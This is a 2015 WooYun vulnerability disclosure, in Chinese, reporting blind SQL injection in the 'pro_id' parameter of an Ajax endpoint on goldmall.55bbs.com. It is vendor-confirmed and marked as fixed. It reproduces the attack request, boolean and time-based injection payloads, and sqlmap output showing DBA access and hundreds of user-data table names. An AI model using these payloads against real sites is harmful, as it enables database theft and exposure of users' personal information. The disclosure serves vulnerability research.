缺陷编号:WooYun-2015-0118240
漏洞标题:我爱购物网两处SQL注入涉及近八百多张表几百万用户信息泄露
相关厂商:55bbs.com
漏洞作者:紫霞仙子
提交时间:2015-06-04 16:40
公开时间:2015-07-19 20:46
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-04: 厂商已经确认,细节仅向厂商公开
2015-06-14: 细节向核心白帽子及相关领域专家公开
2015-06-24: 细节向普通白帽子公开
2015-07-04: 细节向实习白帽子公开
2015-07-19: 细节向公众公开
233
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
POST /index.php?a=Ajaxinsert&c=ShopDetail HTTP/1.1<br> Content-Length: 58<br> Content-Type: application/x-www-form-urlencoded<br> X-Requested-With: XMLHttpRequest<br> Referer: goldmall.55bbs.com<br> Cookie: ****************<br> Host: goldmall.55bbs.com<br> Connection: Keep-alive<br> Accept-Encoding: gzip,deflate<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36<br> Accept: */*pro_id=231&uid=4296763参数pro_id,uid**********************<br> 这里只测试pro_id参数,<br> uid参数自测<br> **********************payload:<br> and 1=1<br> and 1=2 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 |
---<br> Parameter: pro_id (POST)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: pro_id=231 AND 5906=5906&uid=4296763Type: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: pro_id=231 AND (SELECT * FROM (SELECT(SLEEP(5)))wKRM)&uid=4296763<br> ---web application technology: Nginx<br> back-end DBMS: MySQL 5.0.12[INFO] retrieved: [email protected]%<br>current user is DBA: True*********DBA权限*********available databases [3]:<br> [*] `55usercenter`<br> [*] information_schema<br> [*] mysqlDatabase: 55usercenter<br> [728 tables]<br> +-------------------------------------------+<br> | \x0f\x1c\x0fPpn\x10fnkjbwr_\x033 |<br> | 11_test |<br> | 55_announcements |<br> | 55_atme_0 |<br> | 55_atme_10 |<br> | 55_atme_11 |<br> | 55_atme_12 |<br> | 55_atme_13 |<br> | 55_atme_14 |<br> | 55_gethelp |<br> | 55_goldmall_addresses |<br> | 55_goldmall_collect |<br> | 55_goldmall_notice |<br> | 55_goldmall_prodorders |<br> | 55_goldmall_prodtickid |<br> | 55_goldmall_products |<br> | 55_goldmall_records_0 |<br> | 55_goldmall_records_10 |<br> | 55_goldmall_records_11 |<br> | 55_goldmall_records_12 |<br> | 55_goldmall_records_13 |<br> | 55_goldmall_records_14 |<br> | 55_goldmall_records_15 |<br> | 55_medalsuser_0 |<br> | 55_medalsuser_2 |<br> | 55_medalsuser_4 |<br> | 55_members?8es\x02\x04K" |<br> | 55_members_count_1 |<br> | 55_members_count_2 |<br> | 55_members_count_3 |<br> | 55_members_dnail_4 |<br> | 55_members_email_4 |<br> | 55_members_email_6 |<br> | 55_members_email_G |<br> | 55_members_email_b |<br> | 55_members_username>z |<br> | 55_members_username_1 |<br> | 55_members_username_4 |<br> | 55_members_username_5 |<br> | 55_members_username_6 |<br> | 55_members_username_7 |<br> | 55_members_username_b |<br> | 55_members_username_c |<br> | 55_user_0 |<br> | 55_user_1 |<br> | 55_user_2 |<br> | 55_user_3 |<br> | 55_user_4 |<br> | 55_user_5 |<br> | 55_user_6 |<br> | 55_user_7 |<br> | 55_user_8 |<br> | 55_user9! |<br> | 55_userblog_0 |<br> | 55_userblog_11 |<br> | 55_userblog_12 |几百万用户信息 |
~~~~~~
危害等级:高
漏洞Rank:15
确认时间:2015-06-0420:45
漏洞已经修复,感谢作者.
暂无
这个网站这么大,你都能找到,你扫了几天啊
@sql小神 快准狠在这里就体现出来了。
估计这信息早都泄露了 发出来就有背黑锅的
@紫霞仙子 厉害,求带我学习
原文连接
的情况下转载,若非则不得使用我方内容。